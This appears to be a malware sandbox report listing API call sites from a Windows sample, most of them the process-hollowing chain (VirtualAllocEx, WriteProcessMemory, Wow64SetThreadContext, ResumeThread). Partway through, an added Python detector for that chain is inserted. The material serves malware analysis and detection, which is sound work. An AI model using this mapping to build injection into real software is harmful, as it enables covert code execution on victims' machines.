                                      • Opcode ID: 07114311a45f46f51459bf79cbbb5d3ffff6acaa45b8b9ab540a4dfd050cdd8b
                                      • Instruction ID: ee78d526ca1395e202dd699364a18ef10bb4ee2aa08aca414de3ae43215919ac
                                      • Opcode Fuzzy Hash: 07114311a45f46f51459bf79cbbb5d3ffff6acaa45b8b9ab540a4dfd050cdd8b
                                      • Instruction Fuzzy Hash: A141E0B0C00719CBDB24DFAAC884BDEBBF5BF48304F64806AD459AB251DB756946CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 559 8503ca0-8503ca4 560 8503cd5-8503cf6 559->560 561 8503ca6-8503cd4 559->561 565 8503d06-8503d45 WriteProcessMemory 560->565 566 8503cf8-8503d04 560->566 561->560 568 8503d47-8503d4d 565->568 569 8503d4e-8503d7e 565->569 566->565 568->569
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08503D38
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID: >+0
                                      • API String ID: 3559483778-4245186874
                                      • Opcode ID: 195085a4ddd297a1aeded8d2ebbed6e7eb51ca345493017c3d91d4f065b2674d
                                      • Instruction ID: f1262fe9373db390fdd60cd2704f43a520faea7a51203e0d224e6556305b942b
                                      • Opcode Fuzzy Hash: 195085a4ddd297a1aeded8d2ebbed6e7eb51ca345493017c3d91d4f065b2674d
                                      • Instruction Fuzzy Hash: 9B3168759002499FCB10CFA9C885AEEBFF1FF48310F10892AE955A7391D7789945CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 573 8503ca8-8503cf6 575 8503d06-8503d45 WriteProcessMemory 573->575 576 8503cf8-8503d04 573->576 578 8503d47-8503d4d 575->578 579 8503d4e-8503d7e 575->579 576->575 578->579
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08503D38
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID: >+0
                                      • API String ID: 3559483778-4245186874
                                      • Opcode ID: 326a349b49635a2e27e3e6212cdcd36acd3f49e7060ae1170b982ea2fd73a018
                                      • Instruction ID: 93f97eb6141f5c94585632995bc62ed85cd270601e079e0b062832cebb1b834c
                                      • Opcode Fuzzy Hash: 326a349b49635a2e27e3e6212cdcd36acd3f49e7060ae1170b982ea2fd73a018
                                      • Instruction Fuzzy Hash: 992113729002499FCB10CFAAC985BDEBBF5FB48310F10882AE919A7340D7789954CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 583 8503b08-8503b5b 585 8503b6b-8503b9b Wow64SetThreadContext 583->585 586 8503b5d-8503b69 583->586 588 8503ba4-8503bd4 585->588 589 8503b9d-8503ba3 585->589 586->585 589->588
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08503B8E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID: >+0
                                      • API String ID: 983334009-4245186874
                                      • Opcode ID: 78781f2bf58b090495936803a1b6db6e6afcb079460b73cfe78553688b032965
                                      • Instruction ID: e0e0a00f6ff5204087b2139d3e2f211b46ee5839ee1af2f8ed8b583ab3c79e01
                                      • Opcode Fuzzy Hash: 78781f2bf58b090495936803a1b6db6e6afcb079460b73cfe78553688b032965
                                      • Instruction Fuzzy Hash: C42125719002498FDB10DFAAC485BEEBBF4EF88324F14842AD459A7381D7789945CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 593 105d23c-105d6e4 DuplicateHandle 595 105d6e6-105d6ec 593->595 596 105d6ed-105d70a 593->596 595->596
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0105D616,?,?,?,?,?), ref: 0105D6D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID: >+0
                                      • API String ID: 3793708945-4245186874
                                      • Opcode ID: d16cfa84792191049f12817d9b434930bdeaae13f7e54abec574cf0a3581610a
                                      • Instruction ID: 31ef1ffd0ae5d97fcca4bcac9cbdde1a04ddb3e4fab9d508542779ecb4828f12
                                      • Opcode Fuzzy Hash: d16cfa84792191049f12817d9b434930bdeaae13f7e54abec574cf0a3581610a
                                      • Instruction Fuzzy Hash: 2A21E5B5900248EFDB10CF9AD884AEEBBF8EB48310F14845AE959A7350D374A954CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 604 8503d91-8503e25 ReadProcessMemory 607 8503e27-8503e2d 604->607 608 8503e2e-8503e5e 604->608 607->608
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08503E18
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID: >+0
                                      • API String ID: 1726664587-4245186874
                                      • Opcode ID: 704e5e65f226fff0127b9eb1d8c79cf688931c77faf0bbcc9879b88a8a8d10bb
                                      • Instruction ID: 7259f4446c01b4d0b9bd8e625f6ddbae52631c18b98e5f29906059be07783a3b
                                      • Opcode Fuzzy Hash: 704e5e65f226fff0127b9eb1d8c79cf688931c77faf0bbcc9879b88a8a8d10bb
                                      • Instruction Fuzzy Hash: 642145718002499FCB10CFAAC881AEEFBF5FF88320F14882AE518A7240C7789954CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 599 105d648-105d6e4 DuplicateHandle 600 105d6e6-105d6ec 599->600 601 105d6ed-105d70a 599->601 600->601
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0105D616,?,?,?,?,?), ref: 0105D6D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID: >+0
                                      • API String ID: 3793708945-4245186874
                                      • Opcode ID: 50ec89814b8dcada72d8da52a7991e926d7309ce4d35828688f9ec347e9542da
                                      • Instruction ID: c4388bfafe25614024f3273d74f79573e86f9bd9e2e06621316a2e1135c17a77
                                      • Opcode Fuzzy Hash: 50ec89814b8dcada72d8da52a7991e926d7309ce4d35828688f9ec347e9542da
                                      • Instruction Fuzzy Hash: 5221E3B59002489FDB10CFAAD884ADEBFF5EB48310F14841AE958A7350D374A945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 612 8503b10-8503b5b 614 8503b6b-8503b9b Wow64SetThreadContext 612->614 615 8503b5d-8503b69 612->615 617 8503ba4-8503bd4 614->617 618 8503b9d-8503ba3 614->618 615->614 618->617
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08503B8E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID: >+0
                                      • API String ID: 983334009-4245186874
                                      • Opcode ID: 08099fd14675ea73c30ae52a0df048c3f8dc1ff7bb5969792c2063373a3fcd3b
                                      • Instruction ID: 82b0c1d0ae376041ac62707b6e76dc8e34f31e8419a33fd1aca1149e5d8746cb
                                      • Opcode Fuzzy Hash: 08099fd14675ea73c30ae52a0df048c3f8dc1ff7bb5969792c2063373a3fcd3b
                                      • Instruction Fuzzy Hash: C92104719006098FDB10DFAAC485BEEBBF4EF88324F14842AD459A7381DB789945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08503E18
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID: >+0
                                      • API String ID: 1726664587-4245186874
                                      • Opcode ID: d91a38f63e238678853aff5377d29b5f740365899798447e345847f1e61885b7
                                      • Instruction ID: cb7e670a2c400265ca9add87eb64adff6f2422fbf69900d2aa51529c43b96c19
                                      • Opcode Fuzzy Hash: d91a38f63e238678853aff5377d29b5f740365899798447e345847f1e61885b7
                                      • Instruction Fuzzy Hash: 312125718002499FCB10CFAAC885AEEFBF5FF88310F10842AE519A7240C7789954CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0105B039,00000800,00000000,00000000), ref: 0105B24A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: >+0
                                      • API String ID: 1029625771-4245186874
                                      • Opcode ID: 178ed41b732434d96d588601f011b2fecc1170135387a3b189a20d7e5b0577f5
                                      • Instruction ID: 328412a4edc6bf269b10771d79bc6c4dee5d0e7128693366f55ed7b42893deec
                                      • Opcode Fuzzy Hash: 178ed41b732434d96d588601f011b2fecc1170135387a3b189a20d7e5b0577f5
                                      • Instruction Fuzzy Hash: 661129B6D002098FDB14CFAAD884ADEFFF5EB48350F10852AD959A7700C379A545CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08503C56
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: >+0
                                      • API String ID: 4275171209-4245186874
                                      • Opcode ID: 7aebcced8753c3a0996fd93eda69073573eefb9591d0416bece3dedecac8703b
                                      • Instruction ID: fea8dce5296a95472221b303565975886b70d37b35a45e1960da5bf77222f852
                                      • Opcode Fuzzy Hash: 7aebcced8753c3a0996fd93eda69073573eefb9591d0416bece3dedecac8703b
                                      • Instruction Fuzzy Hash: B01156719002499FCB20CFAAC845AEEBFF5FF88320F14881AE459A7250C7759955CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0105B039,00000800,00000000,00000000), ref: 0105B24A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: >+0
                                      • API String ID: 1029625771-4245186874
                                      • Opcode ID: 5238ae5547dfe5c3067ab609c914fa4be0307cba9262c90f75887d6296626b4d
                                      • Instruction ID: e6e28b3d3c24aa2b66bbc95df428aae8bb14748856799f5b1751108c45d621ac
                                      • Opcode Fuzzy Hash: 5238ae5547dfe5c3067ab609c914fa4be0307cba9262c90f75887d6296626b4d
                                      • Instruction Fuzzy Hash: 571114B69003489FDB20CF9AD444AAEFBF5EB88310F10842AE959A7600C375A545CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08503C56
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: >+0
                                      • API String ID: 4275171209-4245186874
                                      • Opcode ID: 58ce1060ddbd43c6e1024aed79d7295d11f02e24ee0cebb6486c38647e48b247
                                      • Instruction ID: c59cb2104091e551115c731d43aa2d72bfedddcc3647f62789343775bf3b273c
                                      • Opcode Fuzzy Hash: 58ce1060ddbd43c6e1024aed79d7295d11f02e24ee0cebb6486c38647e48b247
                                      • Instruction Fuzzy Hash: A31134719002499FCB20DFAAC845ADFBFF5FF88320F14881AE559A7250C779A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID: >+0
                                      • API String ID: 947044025-4245186874
                                      • Opcode ID: c2effc54fe7ad22e704c93f4da41e55d87d5dc46ec97cf1997356dc04b3db3cb
                                      • Instruction ID: b589534e0cb6062200c6fde4bffa80e6861942027f5f027836605de3199b81c5
                                      • Opcode Fuzzy Hash: c2effc54fe7ad22e704c93f4da41e55d87d5dc46ec97cf1997356dc04b3db3cb
                                      • Instruction Fuzzy Hash: 5B1158719002488FDB20CFAAC8457EEFFF4EB88324F24881AD419A7740C7799944CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID: >+0
                                      • API String ID: 947044025-4245186874
                                      • Opcode ID: 036672e894053df46b0568ce912bdf30781668047d96d00165a1529610f7cfdc
                                      • Instruction ID: 15a52a0a35f1f68dc7bbd7950455a9003fe5cd5b9bdae1cb14bd9526b6675c11
                                      • Opcode Fuzzy Hash: 036672e894053df46b0568ce912bdf30781668047d96d00165a1529610f7cfdc
                                      • Instruction Fuzzy Hash: C7113A71D002488FDB20DFAAC8457DEFBF8EB88324F14881AD419A7340C779A544CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%
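The function entries from the 08500000 dump above carry the call sites a hollowing loader needs in one place: VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread (with ReadProcessMemory alongside them). Individually each of these APIs is common in benign software; what makes the sample suspicious is the ordered chain within one calling process against a foreign process. The following is an added example, not code from this report or from Joe Sandbox: a small correlator that walks an API-call trace and emits a finding only when the full chain completes. The ApiCall record layout, the pids, the handle values and SAMPLE_TRACE are constructed for illustration; the API names are the real Win32 exports. Allocations and writes that use the GetCurrentProcess pseudo-handle are deliberately ignored, since self-process writes are routine in JIT and unpacker code and would otherwise flood the detector with false positives.

```python
"""Correlate a recorded API trace into process-hollowing findings.

Added example, not code from this report or from Joe Sandbox. The ApiCall
record and SAMPLE_TRACE are constructed stand-ins for an API-monitor log;
the pids and handle values are invented for illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Tuple

# GetCurrentProcess() pseudo-handle on 32-bit Windows. Allocating and writing
# into one's own process is common in benign code (JIT, unpackers), so such
# calls are not treated as remote injection.
CURRENT_PROCESS = 0xFFFFFFFF

CONTEXT_APIS = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
RESUME_APIS = {"ResumeThread", "NtResumeThread"}


@dataclass
class ApiCall:
    pid: int                        # calling process
    api: str                        # exported name as logged by the monitor
    hprocess: Optional[int] = None  # target process handle, when the API takes one
    hthread: Optional[int] = None   # target thread handle, when the API takes one


@dataclass
class _State:
    alloc: Dict[int, int] = field(default_factory=dict)            # hProcess -> idx of VirtualAllocEx
    write: Dict[int, int] = field(default_factory=dict)            # hProcess -> idx of first WriteProcessMemory
    ctx: Dict[int, Tuple[int, str]] = field(default_factory=dict)  # hThread -> (idx, api) of context change


def find_hollowing(trace: Iterable[ApiCall]) -> List[dict]:
    """Return one finding per ResumeThread that completes the chain
    VirtualAllocEx -> WriteProcessMemory -> *SetThreadContext -> ResumeThread
    inside a single calling process, in that order."""
    states: Dict[int, _State] = {}
    findings: List[dict] = []
    for idx, call in enumerate(trace):
        st = states.setdefault(call.pid, _State())
        if call.api == "VirtualAllocEx":
            if call.hprocess not in (None, CURRENT_PROCESS):
                st.alloc.setdefault(call.hprocess, idx)
        elif call.api == "WriteProcessMemory":
            # only writes into memory this process allocated remotely count
            if call.hprocess in st.alloc:
                st.write.setdefault(call.hprocess, idx)
        elif call.api in CONTEXT_APIS:
            # a context change matters only once a remote image has been written
            if st.write and call.hthread is not None:
                st.ctx.setdefault(call.hthread, (idx, call.api))
        elif call.api in RESUME_APIS:
            if call.hthread in st.ctx:
                ctx_idx, ctx_api = st.ctx.pop(call.hthread)
                targets = sorted(st.write)
                first = targets[0]
                findings.append({
                    "pid": call.pid,
                    "hthread": call.hthread,
                    "targets": targets,
                    "steps": [
                        (st.alloc[first], "VirtualAllocEx"),
                        (st.write[first], "WriteProcessMemory"),
                        (ctx_idx, ctx_api),
                        (idx, call.api),
                    ],
                })
    return findings


# Constructed trace: one benign self-write, one complete hollowing chain and
# one chain that never resumes its thread.
SAMPLE_TRACE = [
    ApiCall(100, "VirtualAllocEx", hprocess=CURRENT_PROCESS),
    ApiCall(100, "WriteProcessMemory", hprocess=CURRENT_PROCESS),
    ApiCall(1, "VirtualAllocEx", hprocess=0x2A8),
    ApiCall(1, "WriteProcessMemory", hprocess=0x2A8),
    ApiCall(1, "WriteProcessMemory", hprocess=0x2A8),
    ApiCall(1, "Wow64SetThreadContext", hthread=0x2AC),
    ApiCall(7, "VirtualAllocEx", hprocess=0x300),
    ApiCall(7, "WriteProcessMemory", hprocess=0x300),
    ApiCall(7, "Wow64SetThreadContext", hthread=0x304),
    ApiCall(1, "ResumeThread", hthread=0x2AC),
]

if __name__ == "__main__":
    for f in find_hollowing(SAMPLE_TRACE):
        chain = " -> ".join(f"{api}@{i}" for i, api in f["steps"])
        print(f"pid {f['pid']}: hollowing chain {chain} "
              f"(target handles {[hex(t) for t in f['targets']]})")
```

The correlator keys on handle values, so it cannot by itself tie the resumed thread to the process that received the image; a monitor that also logs CreateProcess with CREATE_SUSPENDED would let you join the two, and the DuplicateHandle call sites in this report are a reminder that a loader can launder handles before the chain is visible.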

                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 085054FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID: >+0
                                      • API String ID: 410705778-4245186874
                                      • Opcode ID: 7ffb9fac1d3f0de70cfc383a5ba1f36975157daed9d3bc2a3042790dd60fb2a3
                                      • Instruction ID: c11943092234090016d6acd5700bf3b5569a622419da8a686629efcb8f5c7f7e
                                      • Opcode Fuzzy Hash: 7ffb9fac1d3f0de70cfc383a5ba1f36975157daed9d3bc2a3042790dd60fb2a3
                                      • Instruction Fuzzy Hash: 761110B58002889FDB20CFA9D485BEEBFF4FB88310F14881AE559A7240D375A944CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 085054FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID: >+0
                                      • API String ID: 410705778-4245186874
                                      • Opcode ID: 13199cc860d4564adfd9a373329faf4c2b06c690b70dc03431d914713a1ea455
                                      • Instruction ID: c831868d51568ee7c3c56bf382cda86c2eb0986a9ce8c37393bcf46fb7da12d1
                                      • Opcode Fuzzy Hash: 13199cc860d4564adfd9a373329faf4c2b06c690b70dc03431d914713a1ea455
                                      • Instruction Fuzzy Hash: D411F2B58003489FDB20DF9AD849BDEBBF8FB48324F10881AE519B7240D375A944CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0105AFBE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID: >+0
                                      • API String ID: 4139908857-4245186874
                                      • Opcode ID: 63aa161893504a4b66e2d1cf8efcf6c67c12eaaa301c7e97259056728c2d917b
                                      • Instruction ID: eb523ae4ec9c88724cb386219eeb8828b17a69966c75792fec36271841a8e4b9
                                      • Opcode Fuzzy Hash: 63aa161893504a4b66e2d1cf8efcf6c67c12eaaa301c7e97259056728c2d917b
                                      • Instruction Fuzzy Hash: 771110B5D00249CFDB20CF9AD444ADEFBF4EB88324F10855AD969A7640C379A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2868d6c667b200259622fe5ac718df8b0780cd4a4b15289162ca8884f21243b3
                                      • Instruction ID: 2dfa66dfddd354625f79dca1e6bc36a230d43f93e111c9c5789d6bc198635792
                                      • Opcode Fuzzy Hash: 2868d6c667b200259622fe5ac718df8b0780cd4a4b15289162ca8884f21243b3
                                      • Instruction Fuzzy Hash: 6631DFB1C04249CFDF60DFA8C8856EEBBF1EF56314F548189C845AB252C77AA946CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251655322.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fbd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 043146fe46849798b3f431f0d091fc645ebfb849731eb526749ad85a66c74eb2
                                      • Instruction ID: b250c32ca5e095b9766d643855d0b01625f18a4316de305d6fb975cc04f03a46
                                      • Opcode Fuzzy Hash: 043146fe46849798b3f431f0d091fc645ebfb849731eb526749ad85a66c74eb2
                                      • Instruction Fuzzy Hash: F3212872504204DFDB05DF14D9C0B56BF65FB94324F24C569E8090B256D33AE85ADBA3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251729791.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fcd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00b453907546c332a241eee632d1348d79914cb95b7dc3e264a6614d9f58d247
                                      • Instruction ID: d7fbd918347747879880e2babc275efbcfc4ef40d1bbaf367dcbb40630e90e6f
                                      • Opcode Fuzzy Hash: 00b453907546c332a241eee632d1348d79914cb95b7dc3e264a6614d9f58d247
                                      • Instruction Fuzzy Hash: 1B21F571544241DFCB14DF18D6C1F1ABBA5FB84324F24C57DD84A4B25AC33AD847DA62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251729791.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fcd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 53d520effaa5841b357101f45184ffcc2c57a896bfe9337ff903acb915ba5ef7
                                      • Instruction ID: 949da4c5ef2f817f39135f8a5d6a3074a17fa24e853680bc52b56b0d654bee97
                                      • Opcode Fuzzy Hash: 53d520effaa5841b357101f45184ffcc2c57a896bfe9337ff903acb915ba5ef7
                                      • Instruction Fuzzy Hash: 9C210771904205EFDB05DF14DAC1F2ABBA5FB84324F24C57DE8494B255C33AD84ADA61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251729791.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fcd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7ee464acc89c672473369924470d989c7eef47662a690a6841074dca3ee9cb5f
                                      • Instruction ID: 3ddbc750abfe9f442a759b1538f4bb4f8ccb1f68c8bc730a96d4c6d266eec8dc
                                      • Opcode Fuzzy Hash: 7ee464acc89c672473369924470d989c7eef47662a690a6841074dca3ee9cb5f
                                      • Instruction Fuzzy Hash: BA2183755493C08FD712CF24D590B15BF71EB46314F28C5EED8498B6A7C33A980ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251655322.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fbd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cae3b6844d2871f49ad6d6254d0f57adde39064464dffcc4ffd3882d1f7b116e
                                      • Instruction ID: 3c118f9142195590e5843323000645cf913a5c2780631a1fb62110b52e587e99
                                      • Opcode Fuzzy Hash: cae3b6844d2871f49ad6d6254d0f57adde39064464dffcc4ffd3882d1f7b116e
                                      • Instruction Fuzzy Hash: A6110376804280CFCB16CF00D5C0B56BF71FB94324F24C6A9D8090B256C33AE85ADFA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251729791.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fcd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e25339e4a781eaa9bd4a5f7eb4d1d258efe866b60a64346677ccae7196d18d73
                                      • Instruction ID: b08fe057d49c73eee6f03ae70a3b38a5da4e535c90339cc07eb85843cc5ed904
                                      • Opcode Fuzzy Hash: e25339e4a781eaa9bd4a5f7eb4d1d258efe866b60a64346677ccae7196d18d73
                                      • Instruction Fuzzy Hash: F011D075904280DFCB15CF10DAC0B19FB71FB84324F24C6ADD8494B256C33AD80ACB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251655322.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                      Joe Sandbox IDA Plugin
